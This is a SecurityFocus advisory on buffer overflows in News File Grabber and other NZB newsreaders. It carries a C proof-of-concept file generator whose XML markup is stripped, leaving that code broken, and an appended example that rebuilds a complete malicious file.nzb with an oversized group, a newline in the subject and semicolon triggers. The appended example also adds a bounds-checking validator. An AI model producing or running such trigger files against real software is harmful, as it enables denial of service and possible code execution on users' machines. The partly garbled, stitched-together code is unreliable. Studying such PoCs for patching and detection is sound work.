// source: https://www.securityfocus.com/bid/22617/info

News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.

This issue affects version 4.1.0.1; other versions may also be affected.

/*********************************************************************************************
 *
 *  NZB Generic 0Day DoS Exploit
 *  Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor and News Rover
 *
 *  Bugs in News Rover <= 12.1 Rev 1:
 *    There's a stack overflow in RoverNZB triggered by files that contain a long subject.
 *    There's a stack overflow in NewsRover triggered by files that contain a long group.
 *    To trigger: run file.nzb
 *    Impact: Code execution on Windows XP SP1 and SP2
 *
 *  Bug in News File Grabber 4.1.0.1:
 *    If the subject field contains a new line, the app will try to exec data in memory. But
 *    since the address changes every time the app runs it's very hard to exploit. However, I
 *    sometimes got EIP overwritten by my chars.
 *    To trigger: load file.nzb and start download. CPU -> 100% and then Out of Memory error.
 *    Impact: Code execution on Windows XP SP1 and SP2
 *
 *  Bug in Grabit 1.5.3:
 *    Grabit does not correctly handle fields that contain a semicolon.
 *    To trigger: Just grab the file
 *    Impact: DoS
 *    Note: Grabit 1.6 is not affected.
 *
 *  Bug in NewsReactor:
 *    There's a heap overflow that occurs when the group field is too long.
 *    To trigger: load file.nzb, click grab. After a few tries to get the file it crashes.
 *    Impact: Code execution on Windows XP SP1 and DoS on SP2
 *
 *  Bug in NewsBin Pro 4.3.2:
 *    There's a heap overflow that occurs when the group field is too long.
 *    To trigger: load file.nzb and start download. The app should then be unstable.
 *    Impact: Code execution on Windows XP SP1 and DoS on SP2
 *
 *  Bug in NewsBin Pro 5.33 (maybe others...):
 *    There's a heap overflow that occurs when the group field is too long.
 *    To trigger: load file.nzb and start download. Then click "Delete All Posts". Boom!
 *    Impact: Code execution on Windows XP SP1 and DoS on SP2
 *    Note: Maybe it's possible to exec code on SP2, but there are a lot of bad chars and with
 *    the stack protection I didn't find a way to jump to a good return address.
 *
 *  Solution: Buy your DVDs, leecha!!!
 *
 *  Coded and discovered by Marsu
 *  Note: thanks to the Bananas and to KryptonIT. Good luck to the inuITs :P
 *********************************************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* NZB document prologue and epilogue. The XML markup inside these literals did not
 * survive in this copy of the source; only the line breaks remain. */
char nzbheader[]="\n"
                 "\n"
                 "\n"
                 "\n\n";

char nzbend[]="\n"
              "\n"
              "\n"
              "\n";

int main(int argc, char* argv[])
{
    FILE *file;
    char *pad;

    printf("MarsupilamiPowa's Generic NZB DoS Exploit\n");

    file=fopen("file.nzb","wb");
    if (file == NULL) {
        perror("fopen");
        return 1;
    }

    /* Write with fputs rather than fprintf: the strings are data, not format strings. */
    fputs(nzbheader, file);
    fputs("\n", file);          /* file element (its tags did not survive in this copy) */
    fputs("", file);            /* start of the group field (tag did not survive) */

    /* The oversized field: 3000 'A's. NUL-terminated so fputs does not read past the
     * allocation (the original malloc(3000) + memset left it unterminated). */
    pad=(char*)malloc(3000+1);
    if (pad == NULL) {
        fclose(file);
        return 1;
    }
    memset(pad,'A',3000);
    pad[3000]='\0';
    fputs(pad, file);

    fputs("\n\n", file);
    fputs("\n;\n", file);       /* field containing the semicolon that trips Grabit 1.5.3 */
    fputs(nzbend, file);
    fclose(file);
    free(pad);

    printf("file.nzb generated! Have fun\n");
    return 0;
}
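As an added example (not Marsu's code and not from any of the affected products), the generator below writes the same kind of trigger file with the NZB 1.0 markup in place, with the three documented trigger shapes in one document (a newline in the subject, a 3000-byte group, semicolons in a field), and beside it the bounded field check that a reader which copies subject/group into a fixed buffer needs. The DOCTYPE and namespace URI are the public NZB 1.0 values; the poster address, date and message-id are constructed placeholders; the 998-byte bound is the RFC 5322 header line limit and is my assumption for a sane upper limit, as is rejecting CR/LF.

```c
/* Added example: NZB generator with the markup intact, plus the bounded field
 * handling the affected readers lacked. Not part of Marsu's PoC. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed bound: RFC 5322 limits a header line to 998 bytes, so no legitimate
 * Subject or Newsgroups value should exceed it. */
#define MAX_HEADER_FIELD 998

enum field_status { FIELD_OK = 0, FIELD_TOO_LONG = 1, FIELD_BAD_CHAR = 2 };

/* Validate an NZB text field before copying it into a buffer of dstlen bytes:
 * reject oversize values (the long-group/long-subject trigger) and CR/LF
 * (the newline-in-subject trigger). */
enum field_status validate_nzb_field(const char *src, size_t dstlen)
{
    size_t n = strlen(src);
    if (n >= dstlen || n > MAX_HEADER_FIELD)
        return FIELD_TOO_LONG;
    if (strpbrk(src, "\r\n") != NULL)
        return FIELD_BAD_CHAR;
    return FIELD_OK;
}

/* Bounded replacement for an unchecked strcpy into a fixed stack buffer. */
enum field_status copy_nzb_field(char *dst, size_t dstlen, const char *src)
{
    enum field_status st = validate_nzb_field(src, dstlen);
    if (st == FIELD_OK)
        memcpy(dst, src, strlen(src) + 1);
    return st;
}

static const char *xml_entity(char c)
{
    switch (c) {
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '&':  return "&amp;";
    case '"':  return "&quot;";
    case '\'': return "&apos;";
    default:   return NULL;
    }
}

/* Escape XML-special characters so payload bytes cannot break out of their
 * element or attribute. With out == NULL returns the escaped length only;
 * returns -1 if out is too small. */
long xml_escape(char *out, size_t cap, const char *s)
{
    size_t n = 0;
    for (; *s; s++) {
        const char *rep = xml_entity(*s);
        size_t len = rep ? strlen(rep) : 1;
        if (out) {
            if (n + len >= cap)
                return -1;
            memcpy(out + n, rep ? rep : s, len);
        }
        n += len;
    }
    if (out)
        out[n] = '\0';
    return (long)n;
}

/* Build a complete NZB 1.0 document. DOCTYPE and namespace are the public NZB
 * 1.0 values; poster, date and message-id are constructed placeholders. With
 * out == NULL returns the required length; returns -1 on error. */
long build_nzb(char *out, size_t cap, const char *subject, const char *group,
               const char *msgid)
{
    const char *in[3] = { subject, group, msgid };
    char *esc[3] = { NULL, NULL, NULL };
    long n = -1;
    int i;

    for (i = 0; i < 3; i++) {
        long need = xml_escape(NULL, 0, in[i]);
        esc[i] = malloc((size_t)need + 1);
        if (esc[i] == NULL || xml_escape(esc[i], (size_t)need + 1, in[i]) < 0)
            goto done;
    }
    n = snprintf(out, out ? cap : 0,
        "<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
        "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" "
        "\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
        "<nzb xmlns=\"http://www.newzbin.com/DTD/2003/nzb\">\n"
        "<file poster=\"poster@example.invalid\" date=\"1171497600\" subject=\"%s\">\n"
        "<groups>\n<group>%s</group>\n</groups>\n"
        "<segments>\n<segment bytes=\"1\" number=\"1\">%s</segment>\n</segments>\n"
        "</file>\n</nzb>\n", esc[0], esc[1], esc[2]);
    if (out && n >= 0 && (size_t)n >= cap)
        n = -1;
done:
    for (i = 0; i < 3; i++)
        free(esc[i]);
    return n;
}

int main(void)
{
    const char *subject = "Marsu\nNZB PoC";            /* newline in subject: NFG trigger */
    const char *msgid = ";msgid;@example.invalid";      /* semicolons: Grabit 1.5.3 trigger */
    char *group = malloc(3000 + 1), *doc;
    char small[256];
    long n;
    FILE *f;

    if (group == NULL)
        return 1;
    memset(group, 'A', 3000);                           /* 3000-byte group: heap/stack overflow trigger */
    group[3000] = '\0';

    n = build_nzb(NULL, 0, subject, group, msgid);      /* size pass, then fill */
    doc = n < 0 ? NULL : malloc((size_t)n + 1);
    if (doc == NULL || build_nzb(doc, (size_t)n + 1, subject, group, msgid) < 0)
        return 1;
    f = fopen("file.nzb", "wb");
    if (f == NULL)
        return 1;
    fwrite(doc, 1, (size_t)n, f);
    fclose(f);

    /* What a bounds-checking reader does with the same group field: status 1, no copy. */
    printf("bounded copy of 3000-byte group: status %d\n",
           copy_nzb_field(small, sizeof small, group));
    free(group);
    free(doc);
    return 0;
}
```

Compile with `cc -std=c99 -Wall nzbgen.c -o nzbgen` and run it in a scratch directory; it writes `file.nzb` and prints `status 1`, i.e. the oversized group is refused before any copy happens, which is the check the overflowing readers were missing.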